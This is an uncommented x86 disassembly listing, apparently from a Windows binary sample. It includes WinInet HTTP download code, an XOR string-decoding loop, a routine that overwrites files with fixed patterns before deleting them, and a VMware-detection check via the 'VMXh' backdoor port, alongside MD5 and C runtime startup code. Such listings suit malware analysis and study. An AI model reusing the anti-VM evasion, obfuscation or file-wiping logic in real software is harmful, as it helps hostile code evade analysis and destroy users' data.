je r-xdata
push 0x400
mov [ rw-data ] eax
call malloc
add esp 0x4
mov edi eax
xor ebx ebx
mov edx [ esp + 0xc0 ]
or ecx 0xffffffff
mov edi edx
xor eax eax
[ edi ]
not ecx
dec ecx
push ecx
push edx
push eax
push eax
push esi
call [ HttpSendRequestA@IAT ]
jmp r-xdata
mov esi [ InternetCloseHandle@IAT ]
push ebp
call esi
push ebx
call esi
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xa8
retn
call [ GetLastError@IAT ]
xor eax eax
jmp r-xdata
test edi edi
je r-xdata
mov eax [ esp + 0x14 ]
test eax eax
je r-xdata
push 0x0
push 0x7
push eax
push esi
call [ GetDesktopWindow@IAT ]
push eax
call [ InternetErrorDlg@IAT ]
push esi
mov esi [ InternetCloseHandle@IAT ]
call esi
push ebp
call esi
push ebx
call esi
mov ecx [ esp + 0x10 ]
mov [ rw-data ] ecx
push esi
mov esi [ InternetCloseHandle@IAT ]
mov [ rw-data ] 0x0
call esi
push ebp
call esi
mov edx [ esp + 0x18 ]
push edx
call esi
pop edi
pop esi
pop ebp
xor eax eax
pop ebx
add esp 0xa8
retn
push edi
call free
add esp 0x4
push esi
mov esi [ InternetCloseHandle@IAT ]
mov [ ebx + edi ] 0x0
mov [ rw-data ] ebx
call esi
push ebp
call esi
mov eax [ esp + 0x18 ]
push eax
call esi
mov eax edi
pop edi
pop esi
pop ebp
pop ebx
add esp 0xa8
retn
add ebx eax
lea ecx [ ebx + 0x400 ]
push ecx
push edi
call realloc
add esp 0x8
mov edi eax
jmp r-xdata
lea edx [ esp + 0x14 ]
lea eax [ ebx + edi ]
push edx
push 0x3ff
push eax
push esi
call [ InternetReadFile@IAT ]
test eax eax
je r-xdata
sub_4027b0
mov edx [ esp + 0x8 ]
mov ecx [ esp + 0x4 ]
test edx edx
mov eax rw-data
jle r-xdata
retn
push ebx
push esi
mov esi edx
mov dl [ eax ]
mov bl [ ecx ]
add dl 0x17
xor bl dl
inc eax
mov [ ecx ] bl
inc ecx
dec esi
jne r-xdata
mov eax rw-data
cmp [ eax ] 0x0
jne r-xdata
pop esi
pop ebx
sub_4027f0
push ecx
push ebx
push esi
push edi
mov edi [ esp + 0x14 ]
push edi
mov [ esp + 0x10 ] 0x0
call [ PathFileExistsA@IAT ]
test eax eax
je r-xdata
pop edi
pop esi
mov eax 0x8
pop ebx
pop ecx
retn
push rw-data
push edi
call fopen
mov ebx eax
add esp 0x8
test ebx ebx
je r-xdata
pop edi
pop esi
mov eax 0x7
pop ebx
pop ecx
retn
mov eax [ ebx + 0x10 ]
push eax
call _filelength
push ebx
mov esi eax
call fclose
add esp 0x8
test esi esi
jle r-xdata
push edi
call [ DeleteFileA@IAT ]
neg eax
sbb eax eax
pop edi
pop esi
add eax 0x6
pop ebx
pop ecx
retn
push esi
call malloc
mov ebx eax
add esp 0x4
test ebx ebx
je r-xdata
pop edi
pop esi
mov eax 0x4
pop ebx
pop ecx
retn
push ebp
push rw-data
push edi
call fopen
mov ebp eax
add esp 0x8
test ebp ebp
je r-xdata
push rw-data
push edi
call fopen
mov ebp eax
add esp 0x8
test ebp ebp
je r-xdata
mov ecx esi
or eax 0xffffffff
mov edx ecx
mov edi ebx
shr ecx 0x2
[ edi ]
mov ecx edx
push ebp
and ecx 0x3
push esi
push 0x1
push ebx
[ edi ]
call fwrite
push ebp
call fflush
push ebp
call fclose
mov edi [ esp + 0x30 ]
add esp 0x18
mov [ esp + 0x10 ] 0x1
push rw-data
push edi
call fopen
mov ebp eax
add esp 0x8
test ebp ebp
je r-xdata
mov ecx esi
xor eax eax
mov edx ecx
mov edi ebx
shr ecx 0x2
[ edi ]
mov ecx edx
push ebp
and ecx 0x3
push esi
push 0x1
push ebx
[ edi ]
call fwrite
push ebp
call fflush
push ebp
call fclose
mov edi [ esp + 0x30 ]
add esp 0x18
mov [ esp + 0x10 ] 0x1
mov esi [ esp + 0x10 ]
mov ecx esi
mov eax 0x55555555
mov edx ecx
mov edi ebx
shr ecx 0x2
[ edi ]
mov ecx edx
push ebp
and ecx 0x3
push esi
push 0x1
push ebx
[ edi ]
call fwrite
push ebp
call fflush
push ebp
call fclose
mov edi [ esp + 0x30 ]
add esp 0x18
mov esi 0x1
jmp r-xdata
pop edi
pop esi
mov eax 0x3
pop ebx
pop ecx
retn
push edi
call [ DeleteFileA@IAT ]
neg eax
sbb eax eax
pop edi
pop esi
add eax 0x2
pop ebx
pop ecx
retn
push ebx
call free
add esp 0x4
cmp esi 0x1
pop ebp
jne r-xdata
sub_4029b0
push ecx
push rw-data
push rw-data
mov [ esp + 0x8 ] 0x0
call [ GetModuleHandleA@IAT ]
push eax
call [ GetProcAddress@IAT ]
test eax eax
mov [ rw-data ] eax
je r-xdata
mov eax [ esp ]
pop ecx
retn
lea eax [ esp ]
push eax
call [ GetCurrentProcess@IAT ]
push eax
call [ rw-data ]
sub_402a00
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x8
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
call sub_4029b0
test eax eax
jne r-xdata
xor al al
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn
mov [ ebp - 0x4 ] eax
mov eax 0x1
seto [ edi ]
pop es
nop
or edx [ eax + 0x45c79090 ]
nop
cld
sub_402a90
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0xc
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
call sub_4029b0
test eax eax
jne r-xdata
xor al al
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn
mov [ ebp - 0x4 ] eax
push ebx
nop
nop
mov eax 0x564d5868
nop
nop
mov ebx 0x8685d465
nop
nop
nop
mov ecx 0xa
nop
mov dx 0x5658
nop
nop
in eax dx
mov [ ebp - 0x1c ] ebx
pop ebx
mov [ ebp - 0x4 ] 0xffffffff
xor eax eax
cmp [ ebp - 0x1c ] 0x564d5868
sete al
mov ecx [ ebp - 0x10 ]
mov [ fs : 0x0 ] ecx
pop edi
pop esi
pop ebx
mov esp ebp
pop ebp
retn
sub_402b30
push ecx
push ebx
push ebp
push esi
push edi
push 0x38
xor ebp ebp
call malloc
push rw-data
push rw-data
push rw-data
mov esi eax
call sprintf
push esi
call sub_4039a0
add esp 0x14
add esi 0x4
mov ebx rw-data
mov [ esp + 0x10 ] esi
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
cmp [ esi ] 0x1
jne r-xdata
mov esi [ esp + 0x10 ]
inc ebp
add esi 0x4
add ebx 0x4
mov [ esp + 0x10 ] esi
jmp r-xdata
mov eax [ ebx ]
push eax
push rw-data
push rw-data
call sprintf
push ebp
push rw-data
push rw-data
call sprintf
mov edi rw-data
or ecx 0xffffffff
xor eax eax
add esp 0x18
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
mov edi rw-data
or ecx 0xffffffff
[ edi ]
not ecx
sub edi ecx
mov esi edi
mov edx ecx
mov edi rw-data
or ecx 0xffffffff
[ edi ]
mov ecx edx
dec edi
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
cmp ebx rw-data
je r-xdata
sub_402c20
mov edx [ esp + 0x4 ]
push edi
xor eax eax
mov ecx 0x10
lea edi [ edx + 0x18 ]
mov [ edx ] 0x67452301
mov [ edx + 0x4 ] 0xefcdab89
mov [ edx + 0x8 ] 0x98badcfe
mov [ edx + 0xc ] 0x10325476
mov [ edx + 0x10 ] eax
mov [ edx + 0x14 ] eax
[ edi ]
pop edi
retn
sub_402c60
push ebx
mov ebx [ esp + 0x8 ]
push ebp
mov ebp [ esp + 0x14 ]
mov eax [ ebx + 0x10 ]
push esi
push edi
lea ecx [ eax + ebp * 8 ]
cmp ecx eax
mov [ ebx + 0x10 ] ecx
jae r-xdata
mov esi [ ebx + 0x14 ]
mov ecx ebp
shr ecx 0x1d
shr eax 0x3
add esi ecx
and eax 0x3f
mov [ ebx + 0x14 ] esi
je r-xdata
inc [ ebx + 0x14 ]
cmp ebp 0x40
jb r-xdata
mov ecx 0x40
lea edi [ eax + ebx + 0x18 ]
sub ecx eax
cmp ebp ecx
mov [ esp + 0x14 ] ecx
jae r-xdata
mov esi [ esp + 0x18 ]
mov ecx ebp
mov edx ecx
lea edi [ ebx + 0x18 ]
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
pop ebp
pop ebx
retn
mov eax ebp
shr eax 0x6
mov [ esp + 0x14 ] eax
mov esi [ esp + 0x18 ]
mov eax ecx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx eax
push ebx
and ecx 0x3
[ edi ] [ esi ]
lea ecx [ ebx + 0x18 ]
push ecx
push ebx
call sub_402e90
mov eax [ esp + 0x20 ]
mov edx [ esp + 0x24 ]
add edx eax
add esp 0xc
mov [ esp + 0x18 ] edx
sub ebp eax
mov esi [ esp + 0x18 ]
mov ecx ebp
mov edx ecx
shr ecx 0x2
[ edi ] [ esi ]
mov ecx edx
and ecx 0x3
[ edi ] [ esi ]
pop edi
pop esi
pop ebp
pop ebx
retn
mov esi [ esp + 0x18 ]
lea eax [ ebx + 0x18 ]
mov ecx 0x10
mov edi eax
push ebx
push eax
[ edi ] [ esi ]
push ebx
call sub_402e90
mov edx [ esp + 0x24 ]
mov eax [ esp + 0x20 ]
add esp 0xc
add edx 0x40
sub ebp 0x40
dec eax
mov [ esp + 0x18 ] edx
mov [ esp + 0x14 ] eax
jne r-xdata
sub_402d50
push esi
mov esi [ esp + 0xc ]
push edi
mov ecx 0x3f
mov eax [ esi + 0x10 ]
shr eax 0x3
and eax 0x3f
sub ecx eax
lea edi [ eax + esi + 0x18 ]
mov [ edi ] 0x80
inc edi
cmp ecx 0x8
jae r-xdata
add ecx 0xfffffff8
xor eax eax
mov edx ecx
shr ecx 0x2
[ edi ]
mov ecx edx
and ecx 0x3
[ edi ]
mov edx ecx
xor eax eax
shr ecx 0x2
[ edi ]
mov ecx edx
push esi
and ecx 0x3
[ edi ]
lea edi [ esi + 0x18 ]
push edi
push esi
call sub_402e90
add esp 0xc
mov ecx 0xe
xor eax eax
[ edi ]
jmp r-xdata
mov al [ esi + 0x10 ]
push esi
mov [ esi + 0x50 ] al
mov eax [ esi + 0x10 ]
mov ecx eax
mov edx eax
shr eax 0x18
mov [ esi + 0x53 ] al
mov al [ esi + 0x14 ]
shr ecx 0x8
shr edx 0x10
mov [ esi + 0x54 ] al
mov eax [ esi + 0x14 ]
mov [ esi + 0x51 ] cl
mov [ esi + 0x52 ] dl
mov ecx eax
mov edx eax
shr eax 0x18
mov [ esi + 0x57 ] al
lea eax [ esi + 0x18 ]
shr ecx 0x8
shr edx 0x10
push eax
push esi
mov [ esi + 0x55 ] cl
mov [ esi + 0x56 ] dl
call sub_402e90
mov eax [ esp + 0x18 ]
mov cl [ esi ]
add esp 0xc
mov [ eax ] cl
mov edx [ esi ]
shr edx 0x8
mov [ eax + 0x1 ] dl
mov ecx [ esi ]
shr ecx 0x10
mov [ eax + 0x2 ] cl
mov edx [ esi ]
shr edx 0x18
mov [ eax + 0x3 ] dl
mov cl [ esi + 0x4 ]
mov [ eax + 0x4 ] cl
mov edx [ esi + 0x4 ]
shr edx 0x8
mov [ eax + 0x5 ] dl
mov ecx [ esi + 0x4 ]
shr ecx 0x10
mov [ eax + 0x6 ] cl
mov edx [ esi + 0x4 ]
shr edx 0x18
mov [ eax + 0x7 ] dl
mov cl [ esi + 0x8 ]
mov [ eax + 0x8 ] cl
mov edx [ esi + 0x8 ]
shr edx 0x8
mov [ eax + 0x9 ] dl
mov ecx [ esi + 0x8 ]
shr ecx 0x10
mov [ eax + 0xa ] cl
mov edx [ esi + 0x8 ]
shr edx 0x18
mov [ eax + 0xb ] dl
mov cl [ esi + 0xc ]
mov [ eax + 0xc ] cl
mov edx [ esi + 0xc ]
shr edx 0x8
mov [ eax + 0xd ] dl
mov ecx [ esi + 0xc ]
shr ecx 0x10
mov [ eax + 0xe ] cl
mov edx [ esi + 0xc ]
shr edx 0x18
mov [ eax + 0xf ] dl
mov [ esi ] 0x0
pop edi
pop esi
retn
sub_402e90
mov eax [ esp + 0x8 ]
sub esp 0x40
add eax 0x2
push ebx
push ebp
push esi
push edi
lea esi [ esp + 0x10 ]
mov edi 0x10
xor ecx ecx
xor edx edx
mov ch [ eax + 0x1 ]
mov dl [ eax - 0x1 ]
mov cl [ eax ]
add eax 0x4
shl ecx 0x8
or ecx edx
xor edx edx
mov dl [ eax - 0x6 ]
add esi 0x4
shl ecx 0x8
or ecx edx
dec edi
mov [ esi - 0x4 ] ecx
jne r-xdata
mov ebx [ esp + 0x54 ]
mov ebp [ esp + 0x14 ]
mov edi [ ebx + 0xc ]
mov edx [ ebx + 0x8 ]
mov esi [ ebx + 0x4 ]
mov eax [ ebx ]
mov ecx edi
xor ecx edx
and ecx esi
xor ecx edi
add ecx eax
mov eax [ esp + 0x10 ]
lea ecx [ ecx + eax - 0x28955b88 ]
mov eax ecx
shr eax 0x19
shl ecx 0x7
or eax ecx
mov ecx edx
add eax esi
xor ecx esi
and ecx eax
xor ecx edx
add ecx ebp
mov ebp [ esp + 0x18 ]
lea edi [ edi + ecx - 0x173848aa ]
mov ecx edi
shl edi 0xc
shr ecx 0x14
or ecx edi
mov edi esi
xor edi eax
add ecx eax
and edi ecx
xor edi esi
add edi ebp
mov ebp [ esp + 0x1c ]
lea edi [ edx + edi + 0x242070db ]
mov edx edi
shr edx 0xf
shl edi 0x11
or edx edi
mov edi ecx
add edx ecx
xor edi eax
and edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x20 ]
lea edi [ esi + edi - 0x3e423112 ]
mov esi edi
shl esi 0x16
shr edi 0xa
or esi edi
mov edi ecx
add esi edx
xor edi edx
and edi esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x24 ]
lea edi [ eax + edi - 0xa83f051 ]
mov eax edi
shr eax 0x19
shl edi 0x7
or eax edi
mov edi edx
add eax esi
xor edi esi
and edi eax
xor edi edx
add edi ebp
lea edi [ ecx + edi + 0x4787c62a ]
mov ecx edi
shr ecx 0x14
shl edi 0xc
or ecx edi
mov edi esi
add ecx eax
xor edi eax
and edi ecx
xor edi esi
mov ebp [ esp + 0x28 ]
add edi ebp
mov ebp [ esp + 0x2c ]
lea edi [ edx + edi - 0x57cfb9ed ]
mov edx edi
shl edi 0x11
shr edx 0xf
or edx edi
mov edi ecx
xor edi eax
add edx ecx
and edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x30 ]
lea edi [ esi + edi - 0x2b96aff ]
mov esi edi
shr edi 0xa
shl esi 0x16
or esi edi
mov edi ecx
xor edi edx
add esi edx
and edi esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x34 ]
lea edi [ eax + edi + 0x698098d8 ]
mov eax edi
shr eax 0x19
shl edi 0x7
or eax edi
mov edi edx
xor edi esi
add eax esi
and edi eax
xor edi edx
add edi ebp
mov ebp [ esp + 0x38 ]
lea edi [ ecx + edi - 0x74bb0851 ]
mov ecx edi
shr ecx 0x14
shl edi 0xc
or ecx edi
mov edi esi
add ecx eax
xor edi eax
and edi ecx
xor edi esi
add edi ebp
mov ebp [ esp + 0x3c ]
lea edi [ edx + edi - 0xa44f ]
mov edx edi
shr edx 0xf
shl edi 0x11
or edx edi
mov edi ecx
add edx ecx
xor edi eax
and edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x40 ]
lea edi [ esi + edi - 0x76a32842 ]
mov esi edi
shl esi 0x16
shr edi 0xa
or esi edi
mov edi ecx
add esi edx
xor edi edx
and edi esi
xor edi ecx
add edi ebp
lea edi [ eax + edi + 0x6b901122 ]
mov eax edi
shr eax 0x19
shl edi 0x7
or eax edi
mov edi edx
add eax esi
mov ebp [ esp + 0x44 ]
xor edi esi
and edi eax
xor edi edx
add edi ebp
mov ebp [ esp + 0x48 ]
lea ecx [ ecx + edi - 0x2678e6d ]
mov edi ecx
shr edi 0x14
shl ecx 0xc
or edi ecx
mov ecx esi
add edi eax
xor ecx eax
and ecx edi
xor ecx esi
add ecx ebp
mov ebp [ esp + 0x4c ]
lea edx [ edx + ecx - 0x5986bc72 ]
mov ecx edx
shr ecx 0xf
shl edx 0x11
or ecx edx
mov edx edi
add ecx edi
xor edx eax
and edx ecx
xor edx eax
add edx ebp
mov ebp [ esp + 0x14 ]
lea esi [ esi + edx + 0x49b40821 ]
mov edx esi
shl edx 0x16
shr esi 0xa
or edx esi
mov esi ecx
add edx ecx
xor esi edx
and esi edi
xor esi ecx
add esi ebp
mov ebp [ esp + 0x28 ]
lea esi [ eax + esi - 0x9e1da9e ]
mov eax esi
shr eax 0x1b
shl esi 0x5
or eax esi
mov esi edx
add eax edx
xor esi eax
and esi ecx
xor esi edx
add esi ebp
mov ebp [ esp + 0x3c ]
lea edi [ edi + esi - 0x3fbf4cc0 ]
mov esi edi
shr esi 0x17
shl edi 0x9
or esi edi
add esi eax
mov edi esi
xor edi eax
and edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x10 ]
lea edi [ ecx + edi + 0x265e5a51 ]
mov ecx edi
shr ecx 0x12
shl edi 0xe
or ecx edi
mov edi esi
add ecx esi
xor edi ecx
and edi eax
xor edi esi
add edi ebp
lea edi [ edx + edi - 0x16493856 ]
mov edx edi
shl edx 0x14
shr edi 0xc
or edx edi
mov ebp [ esp + 0x24 ]
add edx ecx
mov edi ecx
xor edi edx
and edi esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x38 ]
lea edi [ eax + edi - 0x29d0efa3 ]
mov eax edi
shl edi 0x5
shr eax 0x1b
or eax edi
mov edi edx
add eax edx
xor edi eax
and edi ecx
xor edi edx
add edi ebp
mov ebp [ esp + 0x4c ]
lea edi [ esi + edi + 0x2441453 ]
mov esi edi
shl edi 0x9
shr esi 0x17
or esi edi
add esi eax
mov edi esi
xor edi eax
and edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x20 ]
lea edi [ ecx + edi - 0x275e197f ]
mov ecx edi
shr ecx 0x12
shl edi 0xe
or ecx edi
mov edi esi
add ecx esi
xor edi ecx
and edi eax
xor edi esi
add edi ebp
mov ebp [ esp + 0x34 ]
lea edi [ edx + edi - 0x182c0438 ]
mov edx edi
shl edx 0x14
shr edi 0xc
or edx edi
mov edi ecx
add edx ecx
xor edi edx
and edi esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x48 ]
lea edi [ eax + edi + 0x21e1cde6 ]
mov eax edi
shr eax 0x1b
shl edi 0x5
or eax edi
mov edi edx
add eax edx
xor edi eax
and edi ecx
xor edi edx
add edi ebp
mov ebp [ esp + 0x1c ]
lea edi [ esi + edi - 0x3cc8f82a ]
mov esi edi
shr esi 0x17
shl edi 0x9
or esi edi
add esi eax
mov edi esi
xor edi eax
and edi edx
xor edi eax
add edi ebp
lea edi [ ecx + edi - 0xb2af279 ]
mov ecx edi
mov ebp [ esp + 0x30 ]
shl edi 0xe
shr ecx 0x12
or ecx edi
mov edi esi
add ecx esi
xor edi ecx
and edi eax
xor edi esi
add edi ebp
mov ebp [ esp + 0x44 ]
lea edi [ edx + edi + 0x455a14ed ]
mov edx edi
shl edx 0x14
shr edi 0xc
or edx edi
mov edi ecx
add edx ecx
xor edi edx
and edi esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x18 ]
lea edi [ eax + edi - 0x561c16fb ]
mov eax edi
shr eax 0x1b
shl edi 0x5
or eax edi
mov edi edx
add eax edx
xor edi eax
and edi ecx
xor edi edx
add edi ebp
mov ebp [ esp + 0x2c ]
lea edi [ esi + edi - 0x3105c08 ]
mov esi edi
shr esi 0x17
shl edi 0x9
or esi edi
add esi eax
mov edi esi
xor edi eax
and edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x40 ]
lea ecx [ ecx + edi + 0x676f02d9 ]
mov edi ecx
shr edi 0x12
shl ecx 0xe
or edi ecx
mov ecx esi
add edi esi
xor ecx edi
mov [ esp + 0x58 ] ecx
and ecx eax
xor ecx esi
add ecx ebp
mov ebp [ esp + 0x24 ]
lea edx [ edx + ecx - 0x72d5b376 ]
mov ecx edx
shl ecx 0x14
shr edx 0xc
or ecx edx
mov edx [ esp + 0x58 ]
add ecx edi
xor edx ecx
add edx ebp
mov ebp [ esp + 0x30 ]
lea edx [ eax + edx - 0x5c6be ]
mov eax edx
shr eax 0x1c
shl edx 0x4
or eax edx
mov edx edi
add eax ecx
xor edx ecx
xor edx eax
add edx ebp
lea esi [ esi + edx - 0x788e097f ]
mov ebp [ esp + 0x3c ]
mov edx esi
shr edx 0x15
shl esi 0xb
or edx esi
add edx eax
mov esi edx
xor esi ecx
xor esi eax
add esi ebp
mov ebp [ esp + 0x48 ]
lea edi [ edi + esi + 0x6d9d6122 ]
mov esi edi
shl edi 0x10
shr esi 0x10
or esi edi
mov edi edx
add esi edx
xor edi esi
mov [ esp + 0x58 ] edi
xor edi eax
add edi ebp
mov ebp [ esp + 0x14 ]
lea edi [ ecx + edi - 0x21ac7f4 ]
mov ecx edi
shl ecx 0x17
shr edi 0x9
or ecx edi
mov edi [ esp + 0x58 ]
add ecx esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x20 ]
lea edi [ eax + edi - 0x5b4115bc ]
mov eax edi
shr eax 0x1c
shl edi 0x4
or eax edi
mov edi esi
add eax ecx
xor edi ecx
xor edi eax
add edi ebp
mov ebp [ esp + 0x2c ]
lea edi [ edx + edi + 0x4bdecfa9 ]
mov edx edi
shr edx 0x15
shl edi 0xb
or edx edi
add edx eax
mov edi edx
xor edi ecx
xor edi eax
add edi ebp
mov ebp [ esp + 0x38 ]
lea edi [ esi + edi - 0x944b4a0 ]
mov esi edi
shr esi 0x10
shl edi 0x10
or esi edi
mov edi edx
add esi edx
xor edi esi
mov [ esp + 0x58 ] edi
xor edi eax
add edi ebp
mov ebp [ esp + 0x44 ]
lea edi [ ecx + edi - 0x41404390 ]
mov ecx edi
shl ecx 0x17
shr edi 0x9
or ecx edi
mov edi [ esp + 0x58 ]
add ecx esi
xor edi ecx
add edi ebp
lea edi [ eax + edi + 0x289b7ec6 ]
mov eax edi
shr eax 0x1c
shl edi 0x4
mov ebp [ esp + 0x10 ]
or eax edi
mov edi esi
add eax ecx
xor edi ecx
xor edi eax
add edi ebp
mov ebp [ esp + 0x1c ]
lea edi [ edx + edi - 0x155ed806 ]
mov edx edi
shl edi 0xb
shr edx 0x15
or edx edi
add edx eax
mov edi edx
xor edi ecx
xor edi eax
add edi ebp
mov ebp [ esp + 0x28 ]
lea edi [ esi + edi - 0x2b10cf7b ]
mov esi edi
shl edi 0x10
shr esi 0x10
or esi edi
mov edi edx
add esi edx
xor edi esi
mov [ esp + 0x58 ] edi
xor edi eax
add edi ebp
mov ebp [ esp + 0x34 ]
lea edi [ ecx + edi + 0x4881d05 ]
mov ecx edi
shl ecx 0x17
shr edi 0x9
or ecx edi
mov edi [ esp + 0x58 ]
add ecx esi
xor edi ecx
add edi ebp
mov ebp [ esp + 0x40 ]
lea edi [ eax + edi - 0x262b2fc7 ]
mov eax edi
shr eax 0x1c
shl edi 0x4
or eax edi
mov edi esi
add eax ecx
xor edi ecx
xor edi eax
add edi ebp
mov ebp [ esp + 0x4c ]
lea edi [ edx + edi - 0x1924661b ]
mov edx edi
shr edx 0x15
shl edi 0xb
or edx edi
add edx eax
mov edi edx
xor edi ecx
xor edi eax
add edi ebp
mov ebp [ esp + 0x18 ]
lea edi [ esi + edi + 0x1fa27cf8 ]
mov esi edi
shr esi 0x10
shl edi 0x10
or esi edi
mov edi edx
add esi edx
xor edi esi
xor edi eax
add edi ebp
lea edi [ ecx + edi - 0x3b53a99b ]
mov ecx edi
shl ecx 0x17
shr edi 0x9
or ecx edi
mov edi edx
add ecx esi
not edi
mov ebp [ esp + 0x10 ]
or edi ecx
xor edi esi
add edi ebp
mov ebp [ esp + 0x2c ]
lea edi [ eax + edi - 0xbd6ddbc ]
mov eax edi
shl edi 0x6
shr eax 0x1a
or eax edi
mov edi esi
not edi
add eax ecx
or edi eax
xor edi ecx
add edi ebp
mov ebp [ esp + 0x48 ]
lea edi [ edx + edi + 0x432aff97 ]
mov edx edi
shl edi 0xa
shr edx 0x16
or edx edi
mov edi ecx
not edi
add edx eax
or edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x24 ]
lea edi [ esi + edi - 0x546bdc59 ]
mov esi edi
shr esi 0x11
shl edi 0xf
or esi edi
mov edi eax
add esi edx
not edi
or edi esi
xor edi edx
add edi ebp
mov ebp [ esp + 0x40 ]
lea edi [ ecx + edi - 0x36c5fc7 ]
mov ecx edi
shl ecx 0x15
shr edi 0xb
or ecx edi
mov edi edx
add ecx esi
not edi
or edi ecx
xor edi esi
add edi ebp
mov ebp [ esp + 0x1c ]
lea edi [ eax + edi + 0x655b59c3 ]
mov eax edi
shr eax 0x1a
shl edi 0x6
or eax edi
mov edi esi
add eax ecx
not edi
or edi eax
xor edi ecx
add edi ebp
mov ebp [ esp + 0x38 ]
lea edi [ edx + edi - 0x70f3336e ]
mov edx edi
shr edx 0x16
shl edi 0xa
or edx edi
mov edi ecx
add edx eax
not edi
or edi edx
xor edi eax
add edi ebp
lea edi [ esi + edi - 0x100b83 ]
mov esi edi
shr esi 0x11
shl edi 0xf
or esi edi
mov ebp [ esp + 0x14 ]
mov edi eax
not edi
add esi edx
or edi esi
xor edi edx
add edi ebp
mov ebp [ esp + 0x30 ]
lea edi [ ecx + edi - 0x7a7ba22f ]
mov ecx edi
shr edi 0xb
shl ecx 0x15
or ecx edi
mov edi edx
not edi
add ecx esi
or edi ecx
xor edi esi
add edi ebp
mov ebp [ esp + 0x4c ]
lea edi [ eax + edi + 0x6fa87e4f ]
mov eax edi
shl edi 0x6
shr eax 0x1a
or eax edi
mov edi esi
not edi
add eax ecx
or edi eax
xor edi ecx
add edi ebp
mov ebp [ esp + 0x28 ]
lea edi [ edx + edi - 0x1d31920 ]
mov edx edi
shr edx 0x16
shl edi 0xa
or edx edi
mov edi ecx
add edx eax
not edi
or edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x44 ]
lea edi [ esi + edi - 0x5cfebcec ]
mov esi edi
shr esi 0x11
shl edi 0xf
or esi edi
mov edi eax
add esi edx
not edi
or edi esi
xor edi edx
add edi ebp
mov ebp [ esp + 0x20 ]
lea edi [ ecx + edi + 0x4e0811a1 ]
mov ecx edi
shl ecx 0x15
shr edi 0xb
or ecx edi
mov edi edx
add ecx esi
not edi
or edi ecx
xor edi esi
add edi ebp
mov ebp [ esp + 0x3c ]
lea edi [ eax + edi - 0x8ac817e ]
mov eax edi
shr eax 0x1a
shl edi 0x6
or eax edi
mov edi esi
add eax ecx
not edi
or edi eax
xor edi ecx
add edi ebp
lea edi [ edx + edi - 0x42c50dcb ]
mov edx edi
shr edx 0x16
shl edi 0xa
mov ebp [ esp + 0x18 ]
or edx edi
mov edi ecx
add edx eax
not edi
or edi edx
xor edi eax
add edi ebp
mov ebp [ esp + 0x34 ]
lea esi [ esi + edi + 0x2ad7d2bb ]
mov edi esi
shr edi 0x11
shl esi 0xf
or edi esi
mov esi eax
add edi edx
not esi
or esi edi
xor esi edx
add esi ebp
lea ecx [ ecx + esi - 0x14792c6f ]
mov esi [ ebx ]
add esi eax
mov eax ecx
shl eax 0x15
shr ecx 0xb
mov [ ebx ] esi
mov esi [ ebx + 0x4 ]
or eax ecx
add eax esi
add eax edi
mov [ ebx + 0x4 ] eax
mov eax [ ebx + 0x8 ]
add edi eax
mov eax [ ebx + 0xc ]
mov [ ebx + 0x8 ] edi
add edx eax
pop edi
pop esi
mov [ ebx + 0xc ] edx
pop ebp
pop ebx
add esp 0x40
retn
sub_4037c0
push ecx
cmp eax 0x1000
lea ecx [ esp + 0x8 ]
jb r-xdata
sub ecx eax
mov eax esp
test [ ecx ] eax
mov esp ecx
mov ecx [ eax ]
mov eax [ eax + 0x4 ]
push eax
retn
sub ecx 0x1000
sub eax 0x1000
test [ ecx ] eax
cmp eax 0x1000
jae r-xdata
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_403987
cmp [ rw-data ] ebx
jne r-xdata
call sub_403972
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
